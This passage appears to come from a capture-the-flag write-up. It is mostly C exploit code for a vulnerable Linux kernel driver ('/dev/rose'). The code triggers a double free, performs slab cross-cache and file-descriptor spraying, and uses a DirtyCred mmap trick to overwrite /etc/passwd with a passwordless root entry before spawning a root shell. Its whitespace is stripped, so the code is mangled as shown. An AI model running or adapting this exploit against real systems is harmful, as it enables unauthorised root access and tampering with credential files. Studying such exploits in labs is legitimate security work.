%lld\n",rlimit,r.rlim_max);returnres;}staticint64_tcc_alloc_kmalloc1k_msg(int64_tmsqid){struct{longmtype;charmtext[MSG_SIZE];}msg;msg.mtype=1;memset(msg.mtext,0x41,MSG_SIZE-1);msg.mtext[MSG_SIZE-1]=0;msgsnd(msqid,&msg,sizeof(msg.mtext),0);returnmsqid;}staticvoidcc_free_kmalloc1k_msg(int64_tmsqid){struct{longmtype;charmtext[MSG_SIZE];}msg;msg.mtype=0;msgrcv(msqid,&msg,sizeof(msg.mtext),0,IPC_NOWAIT|MSG_NOERROR);}intopen_rose(){returnopen("/dev/rose",O_RDWR);}introse_fds[2];intfreed_fd=-1;#define NUM_SPRAY_FDS 0x300
intmain(void){puts("=======================");puts("[+] Initial setup");system("echo 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' > /tmp/a");rlimit_increase(RLIMIT_NOFILE);// Alloc the first rose
// This will be used later to trigger double free
rose_fds[0]=open_rose();puts("=======================");puts("[+] Try to free the page");// Based on https://ruia-ruia.github.io/2022/08/05/CVE-2022-29582-io-uring/
kmalloc1k_cc=cc_init(OBJS_PER_SLAB,CPU_PARTIAL,cc_alloc_kmalloc1k_msg,cc_free_kmalloc1k_msg);// Step 1
puts("[+] Step 1: Allocate a lot of slabs (To be put in the partial list later)");cc_next(kmalloc1k_cc);// Step 2
puts("[+] Step 2: Allocate target slab that we want to discard");cc_next(kmalloc1k_cc);// Step 3
puts("[+] Step 3: Put rose in the target slab");rose_fds[1]=open_rose();// Step 4
puts("[+] Step 4: Fulfill the target slab until we have a new active slab");cc_next(kmalloc1k_cc);// Step 5
puts("[+] Step 5: Try to free rose & other objects with hope that the target slab will be empty + be put in the partial list");// Free rose, but rose_fds[0] also pointing to the same chunk,
// and we can use rose_fds[0] later to free other chunk that resides in here
close(rose_fds[1]);cc_next(kmalloc1k_cc);// Step 6
puts("[+] Step 6: Fulfill the partial list and discard the target slab (because it's empty) to per_cpu_pages");cc_next(kmalloc1k_cc);// The page (order 1) will be discarded, and it goes to per_cpu_pages (__free_pages -> free_the_page -> free_unref_page -> free_unref_page_commit)
// We need to make it goes to the free area instead of per_cpu_pages
// Step 7
puts("[+] Step 7: Make PCP freelist full, so that page goes to free area in buddy");cc_deinit(kmalloc1k_cc);// We try to make the page stored in pcp goes to free area by making
// the pcp freelist full.
// Free all allocation that we've made before to trigger it, and after that
// We can start our cross-cach exploitation.
puts("=======================");puts("[+] Start the main exploit");// Trigger cross-cache, file will use the freed page
puts("[+] Spray FDs");intspray_fds[NUM_SPRAY_FDS];for(inti=0;i<NUM_SPRAY_FDS;i++){spray_fds[i]=open("/tmp/a",O_RDWR);// /tmp/a is a writable file
if(spray_fds[i]==-1)fatal("Failed to open FDs");}// Before: 2 fd 1 refcount (rose_fds[1] & spray_fds[i])
puts("[+] Free one of the FDs via rose");close(rose_fds[0]);// After: 1 fd but pointed chunk is free
// Spray to replace the previously freed chunk
// Set the lseek to 0x8, so that we can find easily the fd
puts("[+] Find the freed FD using lseek");intspray_fds_2[NUM_SPRAY_FDS];for(inti=0;i<NUM_SPRAY_FDS;i++){spray_fds_2[i]=open("/tmp/a",O_RDWR);lseek(spray_fds_2[i],0x8,SEEK_SET);}// After: 2 fd 1 refcount (Because new file)
// The freed fd will have lseek value set to 0x8. Try to find it.
for(inti=0;i<NUM_SPRAY_FDS;i++){if(lseek(spray_fds[i],0,SEEK_CUR)==0x8){freed_fd=spray_fds[i];lseek(freed_fd,0x0,SEEK_SET);printf("[+] Found freed fd: %d\n",freed_fd);break;}}if(freed_fd==-1)fatal("Failed to find FD");// mmap trick instead of race with write
puts("[+] DirtyCred via mmap");char*file_mmap=mmap(NULL,0x1000,PROT_READ|PROT_WRITE,MAP_SHARED,freed_fd,0);// After: 3 fd 2 refcount (Because new file)
close(freed_fd);// After: 2 fd 1 refcount (Because new file)
for(inti=0;i<NUM_SPRAY_FDS;i++){close(spray_fds_2[i]);}// After: 1 fd 0 refcount (Because new file)
// Effect: FD in mmap (which is writeable) can be replaced with RDONLY file
for(inti=0;i<NUM_SPRAY_FDS;i++){spray_fds[i]=open("/etc/passwd",O_RDONLY);}// After: 2 fd 1 refcount (but writeable due to mmap)
strcpy(file_mmap,"root::0:0:root:/root:/bin/sh\n");puts("[+] Finished! Open root shell...");puts("=======================");system("su");return0;}
Now, it’s time to upload the script to the remote shell and try to execute it.